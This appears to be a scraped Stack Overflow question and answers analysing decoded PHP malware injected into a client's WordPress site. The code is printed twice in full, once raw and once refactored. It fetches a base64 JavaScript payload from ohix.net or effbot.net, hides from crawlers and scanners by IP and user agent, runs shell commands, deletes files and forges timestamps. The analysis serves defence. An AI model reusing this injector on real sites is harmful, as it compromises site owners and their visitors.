问题
I found this code injected in a number of PHP files on a client's site. Of course the original had been obfuscated and encoded. I've managed to decode it and format it to the current form.
My question is: What exactly is it accomplishing and does the code suggest how it was injected and therefore shedding light on how to prevent this in future?
<?php
if(!function_exists('check_wp_head_load')){
function check_wp_head_load(){
if(!function_exists('cc')){
function cc($ll_0){
$ll_1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
if(function_exists('curl_init')){
$ll_2 = curl_init();
curl_setopt($ll_2, 10002, $ll_0);
curl_setopt($ll_2, 42, 0);
curl_setopt($ll_2, 13, 30);
curl_setopt($ll_2, 19913, 1);
curl_setopt($ll_2, 10018, $ll_1);
if(!(@ini_get("safe_mode") || @ini_get("open_basedir"))){
@curl_setopt($ll_2, 52, 1);
}
@curl_setopt($ll_2, 68, 2);
$ll_3 = curl_exec($ll_2);
curl_close($ll_2);
if($ll_3 !== false){
return $ll_3;
}
}
else if(function_exists('fsockopen')){
global $ll_4;
$ll_0 = str_replace("http://", "", $ll_0);
if(preg_match("#/#", "$ll_0")){
$ll_5 = $ll_0;
$ll_0 = @explode("/", $ll_0);
$ll_0 = $ll_0[0];
$ll_5 = str_replace($ll_0, "", $ll_5);
if(!$ll_5 || $ll_5 == ""){
$ll_5 = "/";
}
$ll_6 = gethostbyname($ll_0);
}
else{
$ll_6 = gethostbyname($ll_0);
$ll_5 = "/";
}
$ll_7 = fsockopen($ll_6, 80, $ll_8, $ll_9, 10);
stream_set_timeout($ll_7, 10);
if($ll_7){
$ll_10 = "GET $ll_5 HTTP/1.0\r\n";
$ll_10 .= "Host: $ll_0\r\n";
$ll_10 .= "Referer: http://$ll_0$ll_5\r\n";
$ll_10 .= "Accept-Language: en-us, en;q=0.50\r\n";
$ll_10 .= "User-Agent: $ll_1\r\n";
$ll_10 .= "Connection: Close\r\n\r\n";
fputs($ll_7, $ll_10);
while(!feof($ll_7)){
$ll_11 .= fgets($ll_7, 4096);
}
fclose($ll_7);
$ll_11 = @explode("\r\n\r\n", $ll_11, 2);
$ll_12 = $ll_11[0];
if($ll_4){
$ll_12 = "$ll_4<br /><br />\n$ll_12";
}
$ll_12 = str_replace("\n", "<br />", $ll_12);
if($ll_11[1]){
$ll_13 = $ll_11[1];
}
else{
$ll_13 = "";
}
if($ll_13){
$ll_11 = $ll_13;
}
else{
$ll_11 = $ll_12;
}
if(preg_match("/Location\:/", "$ll_12")){
$ll_0 = @explode("Location: ", $ll_12);
$ll_0 = $ll_0[1];
$ll_0 = @explode("\r", $ll_0);
$ll_0 = $ll_0[0];
$ll_4 = str_replace("\r\n\r\n", "", $ll_12);
$ll_14 = "Location:";
$ll_4 = str_replace("Location:", $ll_14, $ll_4);
return cc($ll_0);
}
else{
return $ll_11;
}
}
}
else{
echo "ERROR";
exit;
}
}
}
if(!function_exists('detB')){
function detB($ll_15, $ll_16){
$ll_17 = array("66\.249\.[6-9][0-9]\.[0-9]+", "72\.14\.[1-2][0-9][0-9]\.[0-9]+", "74\.125\.[0-9]+\.[0-9]+", "65\.5[2-5]\.[0-9]+\.[0-9]+", "74\.6\.[0-9]+\.[0-9]+", "67\.195\.[0-9]+\.[0-9]+",
"72\.30\.[0-9]+\.[0-9]+", "38\.[0-9]+\.[0-9]+\.[0-9]+", "124\.115\.6\.[0-9]+", "93\.172\.94\.227", "212\.100\.250\.218", "71\.165\.223\.134",
"209\.9\.239\.101", "67\.217\.160\.[0-9]+", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38",
"195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124",
"218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169",
"64\.233\.1[6-8][1-9]\.[0-9]+", "64\.233\.19[0-1]\.[0-9]+", "209\.185\.108\.[0-9]+", "209\.185\.253\.[0-9]+", "209\.85\.238\.[0-9]+", "216\.239\.33\.9[6-9]",
"216\.239\.37\.9[8-9]","216\.239\.39\.9[8-9]","216\.239\.41\.9[6-9]","216\.239\.45\.4","216\.239\.46\.[0-9]+","216\.239\.51\.9[6-9]","216\.239\.53\.9[8-9]",
"216\.239\.57\.9[6-9]","216\.239\.59\.9[8-9]","216\.33\.229\.163","64\.233\.173\.[0-9]+","64\.68\.8[0-9]\.[0-9]+","64\.68\.9[0-2]\.[0-9]+","72\.14\.199\.[0-9]+",
"8\.6\.48\.[0-9]+","207\.211\.40\.82","67\.162\.158\.146","66\.255\.53\.123","24\.200\.208\.112","129\.187\.148\.240","129\.187\.148\.244",
"199\.126\.151\.229","118\.124\.32\.193","89\.149\.217\.191","122\.164\.27\.42","149\.5\.168\.2","150\.70\.66\.[0-9]+","194\.250\.116\.39",
"208\.80\.194\.[0-9]+","62\.190\.39\.205","67\.198\.80\.236","85\.85\.187\.243","95\.134\.141\.250","97\.107\.135\.[0-9]+","97\.79\.239\.[0-9]+",
"184\.168\.191\.[0-9]+","95\.108\.157\.[0-9]+","209\.235\.253\.17");
$ll_18 = array("http","google","slurp","msnbot","bot","crawl",
"spider","robot","httpclient","curl","php","indy library",
"wordpress","charlotte","wwwster","python","urllib","perl",
"libwww","lynx","twiceler","rambler","yandex","trend",
"virus","malware","wget");
$ll_15 = preg_replace("|User\.Agent\:[\s ]?|i", "", $ll_15);
$ll_19 = true;
foreach($ll_17 as $ll_20)
if(eregi("$ll_20", $ll_16)){
$ll_19 = false;
break;
}
if($ll_19)
foreach($ll_18 as $ll_21)
if(eregi($ll_21, $ll_15) !== false){
$ll_19 = false;
break;
}
if($ll_19 and!eregi("^[a-zA-Z]{5,}", $ll_15)){
$ll_19 = false;
}
if($ll_19 and strlen($ll_15) <= 11){
$ll_19 = false;
}
return $ll_19;
}
}
if(!function_exists('rm_rf_file')){
function rm_rf_file($ll_22){
$ll_23 = filemtime($ll_22);
if($ll_24 = opendir($ll_22)){
while(false !==($ll_25 = readdir($ll_24))){
if($ll_25 != "." && $ll_25 != ".." && is_file($ll_25)){
chmod($ll_25, 438);
unlink($ll_25);
}
}
closedir($ll_24);
}
touch($ll_22, $ll_23, $ll_23);
}
}
if(!function_exists('sys_get_temp_dir')){
function sys_get_temp_dir(){
if($ll_26 = getenv("TMP"))
return $ll_26;
if($ll_26 = getenv("TEMP"))
return $ll_26;
if($ll_26 = getenv("TMPDIR"))
return $ll_26;
$ll_26 = tempnam(__FILE__, "");
if(file_exists($ll_26)){
unlink($ll_26);
return dirname($ll_26);
}
return false;
}
}
if(!function_exists('ex')){
function ex($ll_27){
$ll_28 = "";
if(!empty($ll_27)){
if(function_exists('exec')){
@exec($ll_27, $ll_28);
$ll_28 = join("\n", $ll_28);
}
elseif(function_exists('shell_exec')){
$ll_28 = @shell_exec($ll_27);
}
elseif(function_exists('system')){
@ob_start();
@system($ll_27);
$ll_28 = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($ll_27);
$ll_28 = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($ll_29 = @popen($ll_27, "r"))){
$ll_28 = "";
while(!@feof($ll_29)){
$ll_28 .= @fread($ll_29, 1024);
}
@pclose($ll_29);
}elseif(@function_exists('proc_open') && @is_resource($ll_29 = @proc_open($ll_27, array(1 => array("pipe", "w")), $ll_30))){
$ll_28 = "";
if(@function_exists('fread') && @function_exists('feof')){
while(!@feof($ll_30[1])){
$ll_28 .= @fread($ll_30[1], 1024);
}
}
else if(@function_exists('fgets') && @function_exists('feof')){
while(!@feof($ll_30[1])){
$ll_28 .= @fgets($ll_30[1], 1024);
}
}
@proc_close($ll_29);
}
}
return htmlspecialchars($ll_28);
}
}
$ll_31 = "lonly";
$ll_32 = $_SERVER["REMOTE_ADDR"];
$ll_1 = $_SERVER["HTTP_USER_AGENT"];
$ll_33 = $_SERVER["SCRIPT_FILENAME"];
$ll_34 = strtolower($ll_1);
if($ll_32 == "" || $ll_1 == "" || $ll_33 == "")
return null;
if(!isset($_COOKIE[$ll_31])){
$ll_35 = @sys_get_temp_dir();
if(!$ll_35){
$ll_35 = dirname($ll_33);
$ll_36 = $ll_35 ."/.tmp";
}
else{
$ll_36 = $ll_35 ."/.tmp";
if(!@file_exists($ll_36)){
$ll_23 = @filemtime($ll_35);
@mkdir($ll_36);
$ll_37 = @fopen("$ll_36/r", "w");
@fwrite($ll_37, "");
@fclose($ll_37);
@chmod($ll_36, 511);
@touch("$ll_36/r", $ll_23, $ll_23);
@touch($ll_35, $ll_23, $ll_23);
@touch($ll_36, $ll_23, $ll_23);
if(!@file_exists("$ll_36/r")){
$ll_35 = dirname($ll_33);
$ll_36 = $ll_35 ."/.cache";
}
}
}
if(!@file_exists($ll_36)){
$ll_23 = @filemtime($ll_35);
@mkdir($ll_36);
@chmod($ll_36, 511);
@touch($ll_35, $ll_23, $ll_23);
@touch($ll_36, $ll_23, $ll_23);
}
$ll_38 = @date("Hi");
$ll_39 = @date("ymd");
$ll_40 = "$ll_36/$ll_39";
$ll_41 = "$ll_36/tmp_$ll_39";
$ll_42 = $ll_39 - 1;
if(@file_exists("$ll_36/tmp_$ll_42") || ($ll_38 >= "0000" &&
$ll_38 <= "0001") || ($ll_38 >= "1200" &&
$ll_38 <= "1201") || ($ll_38 >= "1800" &&
$ll_38 <= "1801")){
@rm_rf_file($ll_36);
@ex("rm -rf $ll_36/*");
}
if(!@file_exists($ll_40)){
$ll_23 = @filemtime($ll_36);
$ll_37 = @fopen($ll_40, "w");
@fclose($ll_37);
@chmod($ll_40, 511);
@touch($ll_36, $ll_23, $ll_23);
}
if(@is_writable($ll_36) && (!@file_exists($ll_41) || @filesize($ll_41) < 5)){
$ll_43 = array("ohix.", "effbot.", "/f/", "net");
$ll_44 = $ll_43[rand(0, 1)] .$ll_43[3] .$ll_43[2];
$ll_45 = @cc($ll_44);
if($ll_45 != "ERROR" && base64_decode($ll_45) !== false){
$ll_23 = @filemtime($ll_36);
$ll_37 = @fopen($ll_41, "w");
@fwrite($ll_37, "$ll_45");
@fclose($ll_37);
@chmod($ll_41, 511);
@touch($ll_36, $ll_23, $ll_23);
@touch($ll_41, $ll_23, $ll_23);
}
else
return null;
}
$ll_46 = @base64_decode(@file_get_contents($ll_41));
$ll_47 = @file($ll_40);
$ll_48 = false;
foreach($ll_47 as $ll_49){
if(@trim($ll_49) == $ll_32){
$ll_48 = true;
break;
}
}
$ll_19 = @detB($ll_1,$ll_32);
if($ll_48 == false && $ll_19 == true){
$ll_37 = @fopen($ll_40,"a");
@fwrite($ll_37, "$ll_32\n");
@fclose($ll_37);
echo "\n" .str_repeat(" ", mt_rand(300, 1000))
. "<script type='text/javascript'>$ll_46</script>\n";
}
}
}
}
$ll_31 = "lonly";
if(!isset($_COOKIE[$ll_31]))
@add_action("wp_head", "check_wp_head_load", mt_rand(1, 7));
?>
回答1:
Okay, at first analysis of all defined functions and at the end analysis of what does script actually do. The script defines following functions:
Load any URL content, it has 2 implementations (one for curl, second for sockets):
function cc($url) {
$user_agent = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
if (!(@ini_get("safe_mode") || @ini_get("open_basedir"))) {
@curl_setopt($ch, CURLE_GOT_NOTHING, 1);
}
@curl_setopt($ch, CURLOPT_MAXREDIRS, 2);
$content = curl_exec($ch);
curl_close($ch);
if ($content !== false) {
return $content;
}
} else if (function_exists('fsockopen')) {
// Alternative implementation
} else {
echo "ERROR";
exit;
}
}
Some sort of RemoteAddr/User agent validation (when to hide):
function detB($userAgent, $remoteAddr) {
// Those are obviously regexps which will match quite wide range of ip addresses
$ipList = array("66\.249\.[6-9][0-9]\.[0-9]+", "72\.14\.[1-2][0-9][0-9]\.[0-9]+", "74\.125\.[0-9]+\.[0-9]+", "65\.5[2-5]\.[0-9]+\.[0-9]+", "74\.6\.[0-9]+\.[0-9]+", "67\.195\.[0-9]+\.[0-9]+",
"72\.30\.[0-9]+\.[0-9]+", "38\.[0-9]+\.[0-9]+\.[0-9]+", "124\.115\.6\.[0-9]+", "93\.172\.94\.227", "212\.100\.250\.218", "71\.165\.223\.134",
"209\.9\.239\.101", "67\.217\.160\.[0-9]+", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38",
"195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124",
"218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169",
"64\.233\.1[6-8][1-9]\.[0-9]+", "64\.233\.19[0-1]\.[0-9]+", "209\.185\.108\.[0-9]+", "209\.185\.253\.[0-9]+", "209\.85\.238\.[0-9]+", "216\.239\.33\.9[6-9]",
"216\.239\.37\.9[8-9]", "216\.239\.39\.9[8-9]", "216\.239\.41\.9[6-9]", "216\.239\.45\.4", "216\.239\.46\.[0-9]+", "216\.239\.51\.9[6-9]", "216\.239\.53\.9[8-9]",
"216\.239\.57\.9[6-9]", "216\.239\.59\.9[8-9]", "216\.33\.229\.163", "64\.233\.173\.[0-9]+", "64\.68\.8[0-9]\.[0-9]+", "64\.68\.9[0-2]\.[0-9]+", "72\.14\.199\.[0-9]+",
"8\.6\.48\.[0-9]+", "207\.211\.40\.82", "67\.162\.158\.146", "66\.255\.53\.123", "24\.200\.208\.112", "129\.187\.148\.240", "129\.187\.148\.244",
"199\.126\.151\.229", "118\.124\.32\.193", "89\.149\.217\.191", "122\.164\.27\.42", "149\.5\.168\.2", "150\.70\.66\.[0-9]+", "194\.250\.116\.39",
"208\.80\.194\.[0-9]+", "62\.190\.39\.205", "67\.198\.80\.236", "85\.85\.187\.243", "95\.134\.141\.250", "97\.107\.135\.[0-9]+", "97\.79\.239\.[0-9]+",
"184\.168\.191\.[0-9]+", "95\.108\.157\.[0-9]+", "209\.235\.253\.17");
// Those are magic words to be matched
$wordsList = array("http", "google", "slurp", "msnbot", "bot", "crawl",
"spider", "robot", "httpclient", "curl", "php", "indy library",
"wordpress", "charlotte", "wwwster", "python", "urllib", "perl",
"libwww", "lynx", "twiceler", "rambler", "yandex", "trend",
"virus", "malware", "wget");
$userAgent = preg_replace("|User\.Agent\:[\s ]?|i", "", $userAgent);
$replacedHeader = true;
foreach ($ipList as $ip)
if (eregi("$ip", $remoteAddr)) {
$replacedHeader = false;
break;
}
if ($replacedHeader)
foreach ($wordsList as $word)
if (eregi($word, $userAgent) !== false) {
$replacedHeader = false;
break;
}
if ($replacedHeader and !eregi("^[a-zA-Z]{5,}", $userAgent)) {
$replacedHeader = false;
}
if ($replacedHeader and strlen($userAgent) <= 11) {
$replacedHeader = false;
}
return $replacedHeader;
}
Remove file/directory recursively and replace it with own new file (so mtime
will match)
function rm_rf_file($filename) {
$fileMTime = filemtime($filename);
if ($directory = opendir($filename)) {
while (false !== ($directoryItem = readdir($directory))) {
if ($directoryItem != "." && $directoryItem != ".." && is_file($directoryItem)) {
chmod($directoryItem, 438); // 438 = 0666
unlink($directoryItem);
}
}
closedir($directory);
}
touch($filename, $fileMTime, $fileMTime);
}
Get system/php temporary directory (several ways):
function sys_get_temp_dir() {
if ($tmpDir = getenv("TMP"))
return $tmpDir;
if ($tmpDir = getenv("TEMP"))
return $tmpDir;
if ($tmpDir = getenv("TMPDIR"))
return $tmpDir;
// Now it's tmp file, not tmp dir
$tmpDir = tempnam(__FILE__, "");
if (file_exists($tmpDir)) {
unlink($tmpDir);
return dirname($tmpDir);
}
return false;
}
Execute shell command (implementation for all possible executions that php supports):
function ex($shellCommand) {
$result = "";
if (!empty($shellCommand)) {
if (function_exists('exec')) {
@exec($shellCommand, $result);
$result = join("\n", $result);
} elseif (function_exists('shell_exec')) {
$result = @shell_exec($shellCommand);
} elseif (function_exists('system')) {
@ob_start();
@system($shellCommand);
$result = @ob_get_contents();
@ob_end_clean();
} elseif (function_exists('passthru')) {
@ob_start();
@passthru($shellCommand);
$result = @ob_get_contents();
@ob_end_clean();
} elseif (@is_resource($processHandler = @popen($shellCommand, "r"))) {
$result = "";
while (!@feof($processHandler)) {
$result .= @fread($processHandler, 1024);
}
@pclose($processHandler);
} elseif (@function_exists('proc_open') && @is_resource($processHandler = @proc_open($shellCommand, array(1 => array("pipe", "w")), $shellOutput))) {
$result = "";
if (@function_exists('fread') && @function_exists('feof')) {
while (!@feof($shellOutput[1])) {
$result .= @fread($shellOutput[1], 1024);
}
} else if (@function_exists('fgets') && @function_exists('feof')) {
while (!@feof($shellOutput[1])) {
$result .= @fgets($shellOutput[1], 1024);
}
}
@proc_close($processHandler);
}
}
return htmlspecialchars($result);
}
And main payload function:
// This is just initialization for script variables
$cookieKey = "lonly";
$remoteAddr = $_SERVER["REMOTE_ADDR"];
$userAgent = $_SERVER["HTTP_USER_AGENT"];
$scriptFileName = $_SERVER["SCRIPT_FILENAME"];
$userAgentToLower = strtolower($userAgent);
// Requires to have all variables filled
if ($remoteAddr == "" || $userAgent == "" || $scriptFileName == "")
return null;
// Initialization via cookies
if (!isset($_COOKIE[$cookieKey])) {
$tempDir = @sys_get_temp_dir();
// If there's no tmp dir create directory in current directory
if (!$tempDir) {
$tempDir = dirname($scriptFileName);
$tempDirectory = $tempDir . "/.tmp";
// Create directory in temporary directory and hide directory mtime
} else {
$tempDirectory = $tempDir . "/.tmp";
if (!@file_exists($tempDirectory)) {
$directoryMTime = @filemtime($tempDir);
@mkdir($tempDirectory);
$tempFileFP = @fopen("$tempDirectory/r", "w");
@fwrite($tempFileFP, "");
@fclose($tempFileFP);
@chmod($tempDirectory, 511); // 0777
@touch("$tempDirectory/r", $directoryMTime, $directoryMTime);
@touch($tempDir, $directoryMTime, $directoryMTime);
@touch($tempDirectory, $directoryMTime, $directoryMTime);
if (!@file_exists("$tempDirectory/r")) {
$tempDir = dirname($scriptFileName);
$tempDirectory = $tempDir . "/.cache";
}
}
}
// Make sure that directory exists
if (!@file_exists($tempDirectory)) {
$directoryMTime = @filemtime($tempDir);
@mkdir($tempDirectory);
@chmod($tempDirectory, 511); // 0777
@touch($tempDir, $directoryMTime, $directoryMTime);
@touch($tempDirectory, $directoryMTime, $directoryMTime);
}
// Initializes variables
$time = @date("Hi");
$date = @date("ymd");
$ipStorageFile = "$tempDirectory/$date";
$payloadFile = "$tempDirectory/tmp_$date";
$date2 = $date - 1;
// Remove our own mass if there's file one day old,
// or when we launch script at certain times (0000, 1200 and 1800)
if (@file_exists("$tempDirectory/tmp_$date2") || ($time >= "0000" &&
$time <= "0001") || ($time >= "1200" &&
$time <= "1201") || ($time >= "1800" &&
$time <= "1801")) {
@rm_rf_file($tempDirectory);
@ex("rm -rf $tempDirectory/*");
}
// Create one temporary file
if (!@file_exists($ipStorageFile)) {
$directoryMTime = @filemtime($tempDirectory);
$tempFileFP = @fopen($ipStorageFile, "w");
@fclose($tempFileFP);
@chmod($ipStorageFile, 511); // 0777
@touch($tempDirectory, $directoryMTime, $directoryMTime);
}
// If file2 doesn't exists or is empty try to load content from website
// Websites is one of those:
// ohix.net/f/
// effbot.net/f/
if (@is_writable($tempDirectory) && (!@file_exists($payloadFile) || @filesize($payloadFile) < 5)) {
$urlParts = array("ohix.", "effbot.", "/f/", "net");
$url = $urlParts[rand(0, 1)] . $urlParts[3] . $urlParts[2];
$content = @cc($url);
if ($content != "ERROR" && base64_decode($content) !== false) {
$directoryMTime = @filemtime($tempDirectory);
$tempFileFP = @fopen($payloadFile, "w");
@fwrite($tempFileFP, "$content");
@fclose($tempFileFP);
@chmod($payloadFile, 511);
@touch($tempDirectory, $directoryMTime, $directoryMTime);
@touch($payloadFile, $directoryMTime, $directoryMTime);
}
else
return null;
}
// Load contents
$content = @base64_decode(@file_get_contents($payloadFile));
$ipList = @file($ipStorageFile);
$knowenIp = false;
// Check whether this IP was already used
foreach ($ipList as $ip) {
if (@trim($ip) == $remoteAddr) {
$knowenIp = true;
break;
}
}
$clientValidation = @detB($userAgent, $remoteAddr);
if ($knowenIp == false && $clientValidation == true) {
$tempFileFP = @fopen($ipStorageFile, "a");
@fwrite($tempFileFP, "$remoteAddr\n");
@fclose($tempFileFP);
echo "\n" . str_repeat(" ", mt_rand(300, 1000))
. "<script type='text/javascript'>$content</script>\n";
}
}
So if I'm reading all this code correctly the script does following:
- Try to initialize few functions (each explained separately)
- Create temporary directory without modifying
mtime
of parent folder - Load "payload" into
$payloadFile
(probably advertisement content) from one of those sites:ohix.net/f/
effbot.net/f/
- Only display content once a day to each user/ip (
$ipStorageFile
) - Script is smart enough (function
detB
) not to display it's content to certain IPs (probably some bots, security checks and so on) and some user agents (such as googlebots or clients unable to launch javascript by default).
回答2:
After some refactoring and reading, I concluded the script will eventually cause the server to browser to one of the following websites:
- ohic.net/f/
- effbot.net/f/
As well as downloading and executing files from those websites.
It's either that you have a weak password (or otherwise somehow guessable), or it may be a security hole in wordpress. Make sure you have the most updated version.
来源:https://stackoverflow.com/questions/9545554/what-is-this-malware-code-accomplishing